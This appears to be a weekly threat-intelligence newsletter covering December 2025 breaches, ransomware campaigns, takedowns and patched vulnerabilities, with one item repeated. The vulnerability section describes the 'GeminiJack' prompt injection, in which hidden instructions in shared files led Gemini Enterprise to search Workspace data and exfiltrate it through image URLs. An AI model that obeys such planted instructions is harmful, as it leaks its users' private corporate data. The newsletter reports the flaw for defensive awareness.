VerSprite Weekly Threat Intelligence #44
Date
Follow Us
Date Range: 08 December 2025 – 12 December 2025
Issue: 44th Edition
Reported Period Victimology
Security Triumphs of the Week
This week saw significant global security victories: Europol dismantled a $700M crypto laundering network using deepfakes and fraudulent platforms, while the U.S. disrupted AI chip smuggling to China via Operation Gatekeeper. Indonesia neutralized a 14-year-old cybercrime ring mimicking state-sponsored actors, and Ukrainian hacker Victoria Dubranova faced extradition for attacks on U.S. infrastructure. The EU fined X €120M for deceptive verification enabling scams, and the UK penalized LastPass £1.2M for lax security exposing user data. ACE shut down MKVCinemas’ piracy empire, underscoring coordinated efforts against cybercrime, fraud, and illicit tech trade.
Europol takes down crypto and laundering network worth 700 million
Europol dismantled a $700 million cryptocurrency laundering network through coordinated raids in Cyprus, Germany, and Spain, arresting nine suspects and seizing $1.7 million in assets. The network operated fraudulent crypto investment platforms, fake customer support centers, and affiliate marketing schemes to defraud victims. Scammers used aggressive tactics, including criminal call centers pressuring victims to invest more, and deepfake videos featuring celebrities like Elon Musk to promote fake high-return schemes. The operation targeted both the laundering infrastructure and the advertising networks enabling the scams. Europol described the network as a vast, multi-country operation involving deceitful platforms and money laundering. This takedown followed investigations into fraudulent crypto platforms, revealing a complex criminal enterprise.
Read full article: Techradar
DoJ takes down sophisticated network smuggling $160m worth of AI chips to China
The U.S. Department of Justice dismantled a smuggling network illegally exporting $160 million worth of Nvidia H100/H200 AI chips to China, arresting Benlin Yuan and Fanyue Gong. The operation, labeled “Gatekeeper,” involved relabeling GPUs as “SANDKYAN” to bypass export controls, aiming to protect U.S. AI and military technological superiority. Despite the crackdown, President Trump authorized Nvidia to legally sell these chips to China, highlighting tensions between security concerns and trade policies. The suspects used U.S. warehouses to strip Nvidia branding and falsify shipment destinations. The DoJ emphasized the strategic importance of AI chip control for national security.
Read full article: Techradar
National cybercrime network operating for 14 years dismantled in Indonesia
A 14-year-old cybercrime network in Indonesia, resembling state-sponsored operations, was dismantled. The infrastructure included over 320,000 domains, hijacked government subdomains, and thousands of malware-infected Android apps. Attackers used AWS and Firebase for command-and-control, stealing 50,000+ gambling credentials and selling data on dark web markets. Researchers from Malanta.ai noted the operation’s sophistication, scale, and use of reverse proxies to mask malicious traffic as legitimate government communications. The campaign’s longevity and resources suggest potential nation-state involvement, though no direct government link was confirmed. The network evolved from gambling sites into a global, well-funded threat infrastructure.
Read full article: Techradar
US extradites Ukrainian woman accused of hacking meat processing plant for Russia
A Ukrainian woman, Victoria Dubranova, was extradited to the U.S. and charged for allegedly hacking U.S. critical infrastructure, including a meat processing plant and public water systems, on behalf of Russian-linked groups CyberArmyofRussia_Reborn (CARR) and NoName057(16). The attacks caused physical damage, such as spoiled meat and water system breaches, with ties to Russia’s GRU and FSB. Dubranova faces up to 27 years in prison for conspiracy, computer damage, and identity theft. U.S. agencies linked CARR and NoName to Russian state-backed cyber campaigns, offering rewards for information on group members. Authorities urged securing operational technology (OT) systems, emphasizing vulnerabilities in critical infrastructure exploited by unsophisticated yet disruptive attacks. International efforts, including Operation Eastwood, disrupted NoName’s infrastructure.
Read full article: Theregister
Crypto-crasher Do Kwon jailed for 15 years over $40bn UST bust
Terraform Labs founder Do Kwon was sentenced to 15 years in prison for orchestrating a fraud scheme tied to the collapse of the TerraUSD (UST) stablecoin, which erased $40 billion in value. Promoted as a stablecoin pegged to $1, UST’s complex algorithmic mechanisms and linked Luna token failed in May 2022, crashing its value to $0.09 despite a failed $3.5 billion Bitcoin bailout. Kwon, arrested in Montenegro using a fake passport, was extradited to the U.S., where he pleaded guilty to fraud charges. Prosecutors emphasized the scheme’s “epic” scale, with victims losing life savings and facing prolonged financial hardship. The SEC secured $4.5 billion from Terraform’s liquidation, covering only 10% of losses.
Read full article: Theregister
EU fines X $140m, tied to verification rules that make impostor scams easier
The EU fined X (formerly Twitter) €120 million under the Digital Services Act for transparency failures, including a deceptive verification system allowing paid “verified” status without identity checks, enabling impersonation scams. The penalty also addresses X blocking researcher access to public data and lacking ad transparency, hindering risk assessments. Post-Musk’s verification overhaul, fake accounts surged, exemplified by a fraudulent Eli Lilly post causing stock drops. X faces deadlines to address violations, with non-compliance risking further fines. The platform’s lax verification persists, undermining trust in account authenticity. Ongoing EU probes target X’s recommendation systems and content moderation.
Read full article: Malwarebytes
UK ICO Fines LastPass Over 2022 Data Breach
The UK Information Commissioner’s Office (ICO) fined LastPass £1.2 million for a 2022 breach exposing data of 1.6 million British users, including emails, IP addresses, names, and phone numbers. Attackers compromised a developer’s MacBook, stole source code, and later exploited a Plex vulnerability to install a keylogger on another developer’s device, accessing AWS decryption keys. The ICO cited inadequate access controls, allowing employees to link business and personal vaults under one master password. LastPass’s post-breach measures, like restricting personal device use and separating accounts, led to a 30% fine reduction. The company claims user passwords remained secure due to zero-knowledge architecture.
Read full article: Bankinfosec
MKVCinemas streaming piracy service with 142M visits shuts down
The MKVCinemas piracy streaming service, which attracted 142.4 million visits between 2024-2025, was shut down by the Alliance for Creativity and Entertainment (ACE). Supported by major studios like Disney and Netflix, ACE dismantled the network and 25 domains, redirecting users to legal platforms. The operator in Bihar, India, ceased operations and transferred domain control. ACE also disabled a file-cloning tool with 231.4 million visits used to distribute copyrighted content in India and Indonesia. This follows recent ACE actions against Photocall TV piracy (26M users/year) and other illegal streaming networks, emphasizing global anti-piracy efforts.
Read full article: Bleepingcomputer
Security Setbacks of the Week
This week’s security setbacks underscore persistent third-party and supply chain vulnerabilities, with major breaches at a MongoDB database (2 billion PII records), Aeroflot via Bakka Soft, and Asus’ supplier exposing sensitive data. Ransomware attacks targeted healthcare (NHS, Memorial Hospital, Inotiv) and critical infrastructure, exploiting weak vendor security and zero-days, while legal actions and financial penalties surged post breach. Cryptocurrency threats included hardware vulnerabilities, laundering schemes, and violent thefts. Global incidents, from South Korea’s Coupang breach (34M users) to Europol’s crypto takedown, highlight systemic risks in access management, breach detection, and delayed mitigations, emphasizing the need for proactive defense and vendor oversight.
16TB of corporate intelligence data exposed in one of the largest lead-generation dataset leaks
A 16TB MongoDB database containing nearly 2 billion PII records was found exposed online, marking one of the largest lead-generation dataset leaks. The data, likely scraped from LinkedIn and Apollo.io, included names, emails, phone numbers, employment details, social media links, and photos. Researchers suspect ties to a lead-generation company aiding B2B customer outreach. The database was secured after disclosure, but its exposure duration and potential malicious access remain unclear. The leak poses significant risks of identity theft, fraud, and targeted phishing. While ownership wasn’t confirmed, the company in question secured the data two days post-contact. Unprotected databases continue to be a critical vulnerability in data security
Read full article: Techradar
Russian airline hack came through third-party tech vendor
A cyberattack on Russia’s Aeroflot airline in July was reportedly a supply-chain breach via third-party software developer Bakka Soft, which lacked two-factor authentication (2FA) and had existing network access. Attackers exploited months-old vulnerabilities to deploy malware, disrupting over 100 flights and causing tens of millions in damages. Ukrainian and Belarusian hacktivist groups claimed responsibility. The Bell, a Russian media outlet labeled a “foreign agent,” cited sources linking Bakka Soft’s compromised systems to the attack, though details remain unverified. Aeroflot had detected suspicious activity months prior but failed to bolster security. The incident highlights risks of third-party vendor vulnerabilities in critical infrastructure.
Read full article: Techradar
Asus supplier hit by ransomware attack as gang flaunts alleged 1 TB haul
A ransomware attack targeted an Asus supplier, with the Everest gang claiming theft of 1 TB of data, including phone camera source code, AI models, internal tools, and test files. Asus confirmed the third-party breach but stated no impact on its products, systems, or customer data, emphasizing supply chain security improvements. Everest alleged compromising data from Asus, ArcSoft, and Qualcomm, though Asus did not validate these broader claims. The incident follows recent revelations of ~50,000 Asus routers hijacked in a suspected Chinalinked botnet campaign. While unrelated, both events raise concerns over Asus’s security posture and supply chain resilience amid active exploitation of its devices. The company has not clarified if stolen data includes proprietary or third-party content.
Read full article: Theregister
UK Hospital Asks Court to Stymie Ransomware Data Leak
A UK National Health Service (NHS) hospital, Barts Health, is seeking a High Court order to prevent the Clop ransomware group from leaking data stolen in an August attack. The breach compromised invoice data containing patient and staff names, addresses, and payment details but did not affect core IT systems. Clop exploited a zero-day vulnerability in Oracle E-Business Suite, demanding ransoms up to $50 million. The incident follows other ransomware attacks on NHS suppliers, such as the 2024 Synnovis breach, prompting NHS England to introduce voluntary cybersecurity measures for IT vendors. Authorities, including the National Cyber Security Centre, are assessing the impact.
Read full article: Bankinfosec
Drug R&D Firm Facing Costs, Lawsuits in Alleged Qilin Attack
Inotiv, a drug research firm, faces ongoing financial and legal repercussions from an August cyberattack attributed to the Qilin ransomware gang. The company reported $2.48 million in incident-related costs for Q4 2025, totaling nearly $5.93 million for the fiscal year, alongside notifying 9,542 individuals of potential data exposure. Compromised data included names and identifiers of employees, their families, and others linked to the company. Inotiv restored some systems but has not yet determined the full operational or financial impact. Three consolidated class-action lawsuits in Indiana allege negligence in safeguarding data, citing Qilin’s theft of 176 GB of data and dark web leaks. The firm offers affected individuals 24 months of credit monitoring.
Read full article: Bankinfosec
Hospice Firm, Eye Care Practice Notifying 520,000 of Hacks
VITAS Hospice Services and Tri Century Eye Care reported separate hacking incidents affecting 319,177 and 200,000 individuals, respectively. VITAS’ breach occurred via a compromised vendor account, exposing personal and medical data, including Social Security numbers and treatment details. Tri Century’s breach involved unauthorized network access, compromising similar sensitive information. Both organizations notified HHS, implemented enhanced security measures, and offered credit monitoring to affected individuals. These incidents reflect a broader trend of cyberattacks targeting specialty healthcare providers. VITAS’ breach is the largest reported by a hospice provider, while Tri Century’s adds to numerous eye care sector breaches in recent years.
Read full article: Bankinfosec
Georgia Hospital Settles Lawsuit in Alleged Embargo Hack
Memorial Hospital and Manor in Georgia settled a class action lawsuit following a 2024 ransomware attack by the Embargo gang, which exposed 1.15 TB of data affecting 105,170 patients. The breach compromised sensitive information, including Social Security numbers and health data. The settlement offers three compensation options: up to $5,000 for documented losses, up to $100 for time spent addressing the breach, or a $40 one-time payment. All class members receive a year of medical data monitoring and $1 million identity theft insurance. The hospital agreed to pay up to $500,000 in legal fees and service awards but did not commit to specific security improvements. Embargo, a newer ransomware group, has targeted multiple sectors, including healthcare. A final settlement approval hearing is set for January 2026.
Read full article: Bankinfosec
Cryptohack Roundup: Android Chips Hot Wallet Attack
The article highlights several cybersecurity incidents in the cryptocurrency space. Ledger warned of a vulnerability in Android chips (MediaTek Dimensity 7300) allowing physical attacks to extract private keys from hot wallets via electromagnetic fault injection. Europol dismantled a criminal network laundering €700 million through fake crypto platforms, seizing assets across Europe. A British hacker linked to the $243 million Genesis theft was reportedly arrested, with crypto assets seized. A member of a $263 million social engineering ring pleaded guilty to laundering funds stolen via fabricated cybersecurity alerts. Additionally, two suspects were arrested in Vienna for a crypto-linked killing involving coerced wallet access and theft.
Read full article: Bankinfosec
Users report chaos as Legal Aid Agency stumbles back online after cyberattack
The UK Legal Aid Agency (LAA) resumed operations seven months after a major cyberattack, but law firms report ongoing technical issues with its Client and Cost Management System (CCMS). Users face abrupt session timeouts, lost work due to security-driven AWS browser integration, and cumbersome document management processes with strict file size and naming rules. A new multifactor authentication system (SILAS) has extended login times, adding friction. While the LAA claims full service restoration with enhanced security, persistent system instability and laborious workflows frustrate users. The 2023 breach exposed sensitive legal aid data dating back to 2010, though details remain restricted under a government injunction.
Read full article: Theregister
Investigators raid Coupanq HQ following data breach affecting 34 million
South Korean authorities raided Coupang’s headquarters following a massive data breach impacting 34 million customers, with attackers accessing names, emails, phone numbers, addresses, and order details. The breach, undetected from June to November 2025, was linked to a former employee’s account misuse. Over 10,000 victims are pursuing a classaction lawsuit seeking $68 per person in compensation. Police seized internal documents and server logs to investigate the leak’s origin and cause. Coupang, dubbed the “Amazon of South Korea,” is cooperating with government agencies to mitigate further risks. The incident highlights critical lapses in access management and breach detection.
Read full article: Techradar
The New Emerging Threats
Emerging cyber threats showcase escalating state-aligned and criminal operations targeting critical infrastructure with advanced tactics. Chinese state-sponsored actors (Brickworm) and pro-Russia hacktivists exploit vulnerabilities for espionage and sabotage, while ransomware groups (01flip, Warlock) leverage Rust, BYOVD, and RaaS models to evade detection. Phishing campaigns abuse HR themes and Okta/Microsoft integrations to hijack sessions, while AI-driven synthetic fraud and deepfake job scams exploit weak identity controls. Packer-as-a-service (Shanya) and PhaaS kits (GhostFrame) lower barriers for sophisticated attacks, emphasizing the convergence of geopolitical motives, financial crime, and evolving evasion techniques across APAC, North America, and critical sectors.
Chinese hackers used Brickworm malware to breach critical US infrastructure
Chinese state-sponsored hackers deployed Brickworm malware to infiltrate global government and IT networks, targeting VMware vSphere and Windows systems to enable persistent access, file manipulation, and Active Directory compromise. A joint report by CISA, NSA, and Canada’s Cyber Security Centre revealed the malware’s use in long-term espionage, data exfiltration, and potential sabotage, with incidents including a 2024 breach of a U.S. organization’s network. Crowdstrike noted its use against an Asia-Pacific government entity. China denied involvement, labeling the U.S. as a “cyber-bully,” while CISA warned of ongoing risks to critical infrastructure. The campaign highlights escalating cyber threats linked to Chinese actors targeting geopolitical adversaries.
Read full article: Techradar
New 01flip Ransomware Hits APAC Critical Infra: Cross-Platform Rust Weapon Uses Sliver C2
A new ransomware named 01flip, written in Rust for cross-platform attacks, is targeting critical infrastructure in the APAC region, notably in the Philippines and Taiwan. Developed by threat cluster CL-CRI-1036, it uses Sliver C2 for lateral movement and exploits vulnerabilities like CVE-2019-11580 for initial access. The manual, financially motivated attacks involve data exfiltration and dark web leaks. Code references to “lockbit” suggest potential ties to LockBit, though no direct evidence confirms this. The use of Rust highlights evolving evasion tactics, posing detection challenges for defenders. Palo Alto Networks’ Unit 42 warns of its early-stage but high-impact activity.
Read full article: Securityonline
US Warns of Ongoing Pro-Russia Critical Infrastructure Hacks
U.S. and allied agencies warned pro-Russia hacktivists are targeting critical infrastructure using low-skill techniques like exploiting exposed remote access tools with weak authentication. Groups such as Cyber Army of Russia Reborn and NoName057(16) opportunistically breach operational technology, risking physical disruptions in sectors like water and energy. Ukrainian national Victoria Dubranova was extradited and indicted for supporting these groups, allegedly tampering with U.S. water systems, including a 2024 Texas incident causing overflow. Attacks, though less sophisticated than state-sponsored operations, exploit poor network segmentation, enabling access to control systems. Prosecutors link these groups to Russian government support for funding cybercrime tools. The advisory emphasizes risks to critical infrastructure from persistent, opportunistic breaches.
Read full article: Bankinfosec
GOLD BLADE APT Hits Canadian Firms with BYOVD EDR Killer and Ransomware Delivered Via Fake Resumes
The GOLD BLADE APT group (aka RedCurl/RedWolf) has targeted Canadian organizations in a campaign combining corporate espionage and ransomware since early 2024. Using weaponized resumes delivered via recruitment platforms like Indeed, they deploy RedLoader malware and a BYOVD (Bring Your Own Vulnerable Driver) technique to disable EDR and Windows security mechanisms. The group selectively uses QWCrypt ransomware for monetization, shifting from traditional phishing to stealthier HR-themed social engineering. Sophos reports their tactics include abusing vulnerable Zemana drivers and modifying system registries to bypass defenses. GOLD BLADE’s calculated, evolving methods reflect a professionalized operation focused on high-impact intrusions.
Read full article: Securityonline
Sophisticated Okta SSO Phishing Bypasses Defenses to Steal Session Tokens With Salary Review Lures
A sophisticated phishing campaign exploiting Okta SSO and Microsoft 365 integrations is targeting organizations with salary review-themed lures to steal session tokens. Active since December 2025, attackers send HR-themed emails with urgent subjects and encrypted PDFs to bypass security scanners. The operation uses a proxy system mimicking legitimate Okta login pages, dynamically redirecting victims from fake Microsoft 365 pages to phishing sites. Malicious scripts capture credentials and critical session cookies (e.g., “JSESSIONID”) via client-side injection, enabling session hijacking. Attackers leverage Cloudflare to mask infrastructure and continuously refine evasion tactics. This campaign highlights advanced session token theft techniques bypassing multi-factor authentication.
Read full article: Securityonline
Synthetic Businesses: The New Billion-Dollar Fraud Machine
Synthetic entity fraud, leveraging fake businesses, has surged due to weak U.S. state registration controls and AI-generated documents, enabling fraudsters to create fraudulent entities for under $150 with potential payouts exceeding $100,000 per identity. Outdated business registration systems, lacking identity verification and address validation, allow criminals to exploit AI-generated bank statements, invoices, or stolen data to mimic legitimacy. Andrew La Marca of Dun & Bradstreet highlights AI’s role in automating document fabrication and streamlining fraud processes, exacerbating risks for lenders and private equity firms. The low-cost, high-reward model and poor oversight in online registries have transformed this threat from niche to mainstream, demanding enhanced due diligence and regulatory controls to mitigate financial and compliance risks.
Read full article: Bankinfosec
Hackers observed injecting legitimate banking apps with malicious code
A cybercriminal group, likely GoldFactory, is injecting legitimate banking apps with malicious code to steal credentials and conduct financial fraud. The attackers decompile authentic apps, insert remote-access trojans or backdoors, and distribute them via phishing campaigns and fake websites mimicking governments or service providers. Advanced malware families like SkyHook and FriHook enable device takeover, data capture, and remote control while evading detection. The campaign primarily targets Asia-Pacific users, compromising tens of thousands and exposing financial institutions. GoldFactory previously used biometric data theft and deepfakes (e.g., GoldPickaxe) to infiltrate banking systems. The group’s tactics highlight sophisticated social engineering and technical evasion techniques.
Read full article: Techradar
GOLD SALEM tradecraft for deploying Warlock ransomware
The GOLD SALEM cybercrime group has deployed Warlock ransomware since March 2025, exploiting SharePoint vulnerabilities (including ToolShell zero-days) and leveraging tools like Velociraptor, Cloudflared, and AV/EDR-killers for initial access, defense evasion, and C2. Their tradecraft includes credential theft, DLL side-loading, and BYOVD attacks using Chinese signed drivers. Targeting sectors like government, energy, and IT, they deployed Warlock (based on LockBit 3.0), LockBit, and Babuk ransomware. While victimology overlaps with Chinese state interests, activities appear financially motivated. Sophos recommends securing SharePoint instances and deploying robust AV/EDR to counter their evolving tactics.
Read full article: Sophos
Inside Shanya, a packer-as-a-service fueling modern attacks
The article discusses Shanya, a new packer-as-a-service (PaaS) tool used by ransomware groups to evade detection. Shanya offers anti-analysis features, unique encryption per customer, and EDR bypass techniques, making it a successor to HeartCrypt. It employs API hashing, memory manipulation, and kernel driver abuse to disable security tools. The packer has been linked to EDR-killer malware and CastleRAT, deployed via DLL sideloading in attacks targeting sectors like hospitality. Sophos identified its use in Akira, Qilin, and Crytox ransomware operations, with detections globally, notably in UAE and Tunisia. Protections include specific signatures to block Shanya-related threats.
Read full article: Sophos
Deepfakes, AI resumes, and the growing threat of fake applicants
Fake job applicants using AI-generated resumes, fabricated identities, and deepfake interviews pose significant cybersecurity risks. Attackers employ polished, AI-crafted materials to bypass hiring systems, aiming for financial gain, identity fraud, or corporate system access. Tactics include subcontracting roles to cheaper labor, forging employment documents, and harvesting data to refine future scams. Advanced methods involve real-time deepfakes with subtle flaws, while LinkedIn profiles are scraped to build credible impostor identities. Recruiters must verify identities via video checks, cross-reference details, and secure onboarding processes. Proactive screening is critical to prevent breaches and protect organizational integrity.
Read full article: Malwarebytes
Russian hackers debut simple ransomware service, but store keys in plain text
CyberVolk, a pro-Russian hacktivist group, has reemerged with a ransomware-as-a-service (RaaS) operation called VolkLocker, managed entirely via Telegram to simplify attacks for less skilled affiliates. The ransomware, targeting both Linux and Windows systems, uses AES-256 encryption but critically hardcodes master keys into executables and stores them in plaintext, enabling victims to potentially recover files without paying ransoms. Despite sophisticated Telegram automation for payload generation and command-and-control, the group’s operational flaws like retaining test artifacts highlight quality control issues amid rapid expansion. SentinelOne researchers note CyberVolk’s blend of ransomware and hacktivism reflects broader trends of politically motivated actors lowering barriers to cybercrime. While lacking direct Kremlin ties, the group’s resurgence underscores evolving threats from state aligned collectives leveraging accessible platforms like Telegram.
Read full article: Theregister
Vulnerability Spotlight: Critical Exposures Unveiled
Critical vulnerabilities across widely used platforms dominated cybersecurity efforts, with CISA flagging active exploitation of GeoServer’s XML flaw (CVE-2025-58360) and WordPress Soledad theme privilege escalation (CVE-2025-64188). Major vendors like Google and Microsoft addressed zero-days in Chrome and Windows, while unpatched RCEs in Gogs and React Server Components fueled attacks, including cryptomining and espionage. Leaked tools like ValleyRAT’s builder and Intellexa’s Predator spyware amplified threats, exploiting zero-days and encryption flaws. Cloud risks surged as Docker Hub images exposed live credentials, and AI systems like Gemini faced data exfiltration via poisoned inputs. Urgent patching and enhanced safeguards remain critical amid escalating exploitation.
CISA KEV Alert: GeoServer XXE Flaw Under Active Attack Risks Data Theft & Internal Network Scanning
CISA added a critical XXE vulnerability (CVE-2025-58360) in GeoServer to its Known Exploited Vulnerabilities catalog due to active exploitation. The flaw in GeoServer’s XML processing via the /geoserver/wms endpoint allows attackers to read arbitrary files, perform SSRF-based internal network scanning, and launch DoS attacks. Federal agencies must patch by January 1, 2026. GeoServer maintainers released fixes in versions 2.25.6, 2.26.3, and 2.27.0. Immediate patching is urged to mitigate risks of data theft and unauthorized network access. CISA emphasizes the vulnerability’s severity as a frequent attack vector.
Read full article: Securityonline
CVE-2025-64188 (CVSS 9.8): Critical “Soledad” Theme Flaw Lets Subscribers Take Over WordPress Sites
A critical vulnerability (CVE-2025-64188, CVSS 9.8) in the Soledad WordPress theme (versions ≤8.6.9) allows low-privileged users (e.g., Subscribers) to escalate privileges and fully compromise sites. The flaw stems from improper access controls in the theme’s penci_update_option AJAX function, which lacked user permission checks despite nonce validation. Attackers could abuse this to modify critical settings like enabling open registration with Administrator roles. Patched in version 8.6.9.1, the fix adds a permissions check to restrict unauthorized access. Administrators must update immediately to prevent site takeover risks.
Read full article: Securityonline
December Patch Tuesday fixes three zero-days, including one that hijacks Windows devices
Microsoft’s December Patch Tuesday addressed 57 security vulnerabilities, including three actively exploited zero-days. Critical fixes target Windows 10, 11, Server, Office, and related services. The resolved zero-days include CVE-2025-62221 (privilege escalation in Windows Cloud Files Mini Filter Driver), CVE-2025-64671 (GitHub Copilot RCE), and CVE-2025-54100 (PowerShell RCE). A new PowerShell warning now alerts users when “Invoke-WebRequest” runs without safe parameters to prevent unintended script execution from web content. Windows 10 users receive only security updates, as feature updates are discontinued. Microsoft recommends applying patches via Windows Update to mitigate risks from these exploits.
Read full article: Malwarebytes
December Patch Tuesday fixes three zero-days, including one that hijacks Windows devices
Microsoft’s December Patch Tuesday addressed 57 security vulnerabilities, including three actively exploited zero-days. Critical fixes target Windows 10, 11, Server, Office, and related services. The resolved zero-days include CVE-2025-62221 (privilege escalation in Windows Cloud Files Mini Filter Driver), CVE-2025-64671 (GitHub Copilot RCE), and CVE-2025-54100 (PowerShell RCE). A new PowerShell warning now alerts users when “Invoke-WebRequest” runs without safe parameters to prevent unintended script execution from web content. Windows 10 users receive only security updates, as feature updates are discontinued. Microsoft recommends applying patches via Windows Update to mitigate risks from these exploits.
Read full article: Malwarebytes
Zero Day: 700 Instances of Self-Hosted Git Service Exploited
A zero-day vulnerability (CVE-2025-8110) in the self-hosted Git service Gogs has been actively exploited, compromising over 700 internet-exposed instances. The flaw enables remote code execution, allowing attackers to steal repositories, deploy cryptominers, or potentially stage ransomware. Researchers at Wiz identified the unpatched flaw after analyzing a customer’s malware infection linked to a malicious Git repository pattern. Attackers used the SuperShell framework to establish reverse SSH connections, indicating financially motivated operations. Gogs maintainers acknowledged the issue but have not yet released a patch, with exploitation continuing since July. Mitigations include disabling open registration and restricting external access to Gogs instances until updates are available.
Read full article: Bankinfosec
Military-Grade ValleyRAT Goes Rogue: Kernel Rootkit Builder Leak Triggers Massive Global Surge
The article details the proliferation of ValleyRAT, a sophisticated modular backdoor and kernel rootkit, following the leak of its builder tool. Previously restricted to Chinese-linked threat actors like Silver Fox, the malware’s public availability has led to an 85% surge in global detections over six months. ValleyRAT’s advanced capabilities include bypassing Windows 11 security via signed drivers, stealthy driver installation, and disabling antivirus tools. The leak complicates attribution, enabling cybercriminals to customize attacks, escalating risks for enterprises. Researchers warn of its transition to a widely accessible framework, amplifying threats from previously exclusive military-grade tools.
Read full article: Securityonline
Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
Hackers are exploiting a cryptographic vulnerability in Gladinet’s CentreStack and Triofox products, leveraging hardcoded AES encryption keys and initialization vectors to decrypt access tickets and achieve remote code execution (RCE). The static keys, derived from fixed Chinese and Japanese text strings, allow attackers to forge access tickets, access sensitive files, and exploit a ViewState deserialization flaw for RCE. At least nine organizations across sectors like healthcare and technology have been targeted. Gladinet released patches (version 16.12.10420.56791) and advised rotating machine keys. Indicators of compromise include the IP 147.124.216[.]205 and the string “vghpI7EToZUDIZDdprSubL3mTZ2” in logs. Immediate updates and log scans are recommended.
Read full article: Bleepingcomputer
Google Patches AI Flaw That Turned Gemini Into a Spy
Google addressed a critical vulnerability in its Gemini Enterprise AI, dubbed GeminiJack, which enabled attackers to exfiltrate corporate data via poisoned documents, emails, or calendar invites without user interaction. Exploiting AI’s retrieval-augmented generation architecture, hidden instructions in shared files triggered Gemini to search sensitive terms across Workspace data (Gmail, Docs, Calendar) and send results via disguised image URLs. The zero-click flaw bypassed traditional security tools, as no malware or unauthorized data channels were involved. Noma Labs discovered the issue, prompting Google to update how Gemini and Vertex AI interact with retrieval systems. The attack highlights risks of blending untrusted content with AI’s privileged access, emphasizing the need for architectural safeguards. This incident underscores emerging AI-native threats requiring enhanced trust boundaries.
Read full article: Bankinfosec
Denial of service and source code exposure in React Server Components
The React Team disclosed two new vulnerabilities in React Server Components: a High Severity Denial of Service (DoS) and a Medium Severity Source Code Exposure. The DoS (CVE-2025-55184, CVE-2025-67779) allows malicious HTTP requests to trigger infinite loops, crashing servers. The Source Code Exposure (CVE-2025-55183) risks leaking hardcoded secrets via server function code. Affected packages (react-server-dom-webpack, react-server dom-parcel, react-server-dom-turbopack) require immediate upgrade to versions 19.0.3, 19.1.4, or 19.2.3, as prior patches (19.0.2, 19.1.3, 19.2.2) were incomplete. Frameworks like Next.js and React Router are impacted if using React Server Components. Hosting providers applied mitigations, but users must update to fully resolve risks.
Read full article: Hackernews
Half of exposed React servers remain unpatched amid active exploitation
A critical React server-side vulnerability (CVE-2025-55182), dubbed React2Shell, remains unpatched in 50% of exposed systems despite active exploitation by over 15 attack clusters. These range from cryptominers to state-linked threat actors deploying tools like Sliver C2, BPFDoor, and EtherRat variants. Attackers are increasingly using anti-forensics techniques to evade detection, while Chinese and North Korean groups are suspected in targeted intrusions. The flaw, affecting React Server Components and frameworks like Next.js, enables remote code execution via unsafe deserialization. React’s widespread use in cloud environments amplifies risks, as patching lags despite rapid weaponization of the bug.
Read full article: Theregister
10K Docker images spray live cloud creds across the internet
A recent analysis by Flare revealed over 10,000 public Docker Hub images exposing live cloud credentials, including API keys for AI services, production systems, and critical infrastructure from 100+ organizations, such as a Fortune 500 company and a major bank. Nearly half contained five or more secrets, enabling attackers to exploit multiple systems via a single pull. Many leaks stemmed from unmonitored “shadow IT” accounts, like a bank contractor’s registry with 430+ unprotected images. Despite removals, 75% of exposed credentials remained active. Flare urged developers to adopt secrets management tools and pre-push scanning to prevent breaches.
Read full article: Theregister
In-Depth Expert CTI Analysis
Global law enforcement disrupted major cybercriminal operations, including Europol’s takedown of a $700M crypto laundering network and the DoJ’s crackdown on AI chip smuggling to China, while ransomware groups increasingly targeted critical infrastructure, exemplified by attacks on healthcare providers and Aeroflot’s supply chain. State-aligned actors exploited vulnerabilities in software like React and GeoServer, with Chinese APTs deploying advanced malware for espionage and Russian-linked hacktists breaching U.S. water systems. Emerging threats included AI-driven fraud, Rust-based ransomware, and sophisticated phishing kits bypassing MFA, alongside persistent risks from exposed credentials in platforms like Docker Hub and unpatched zero-days in Chrome and Gogs.
Proactive Defense and Strategic Foresight
Proactive defense demands anticipatory measures, as seen in Europol’s disruption of crypto laundering infrastructure and the DoJ’s export control enforcement, targeting adversarial capabilities before exploitation. Strategic foresight requires addressing evolving threats like AI-driven synthetic fraud, state-aligned ransomware, and third-party vulnerabilities exemplified by Aeroflot’s supply-chain breach and Gladinet’s cryptographic flaws. The surge in AI-native attacks (GeminiJack) and unpatched critical vulnerabilities (React2Shell, GeoServer) underscores the urgency of continuous threat modeling, zero trust architectures, and cross-sector intelligence sharing. Organizations must prioritize hardening OT systems, securing AI integrations, and enforcing stringent vendor oversight to mitigate cascading risks in an increasingly interconnected threat landscape.
Evolving Ransomware and Malware Tactics
Ransomware and malware tactics are rapidly evolving, leveraging AI-generated deepfakes, Rust-based cross-platform code, and supply chain vulnerabilities to maximize impact. Recent incidents highlight aggressive targeting of critical infrastructure (e.g., healthcare, aviation) via third-party vendors and zero-day exploits, while ransomware-as-a-service models like VolkLocker lower entry barriers for attackers. Advanced evasion techniques, including Shanya packer-as-a-service and EDR-killing BYOVD attacks, challenge detection. Geopolitical hacktivists and state-aligned groups increasingly weaponize low skill tactics, such as exposed OT access, to disrupt operations. Meanwhile, AI-driven social engineering and synthetic identity fraud enable hyper-targeted phishing, underscoring the need for robust identity verification and proactive third-party risk management.
State-Sponsored and Organized Cybercrime Convergence
The convergence of state-sponsored and organized cybercrime is accelerating, evidenced by blurred operational tactics and shared infrastructure. Pro-Russian hacktivist groups (e.g., CyberArmyofRussia_Reborn) targeting U.S. critical infrastructure with low-skill attacks mirror state objectives, while Indonesian cybercrime networks exhibit nation-state level sophistication. Chinese APTs like Brickworm deploy dual-use malware for espionage and sabotage, while ransomware groups (GOLD SALEM) adopt state-aligned tradecraft. Criminal laundering networks leverage deepfakes and crypto platforms akin to disinformation campaigns, and tools like ValleyRAT transition from exclusive military use to commodified cybercrime. This symbiosis erodes attribution, amplifies global risks, and demands coordinated defenses against hybrid threats exploiting geopolitical and financial motives.
Operational and Tactical Implications
Operational Implications: Cross-border collaboration remains critical in disrupting large scale cybercriminal networks, as seen in Europol’s takedown of crypto laundering infrastructure and the DoJ’s export control enforcement. Persistent vulnerabilities in third party vendors (e.g., Aeroflot’s breach via Bakka Soft) and supply chains (Asus, NHS) demand rigorous vendor risk management. Regulatory pressures, such as EU’s DSA fines and CISA’s GeoServer mandate, require organizations to prioritize transparency, patch management, and compliance.
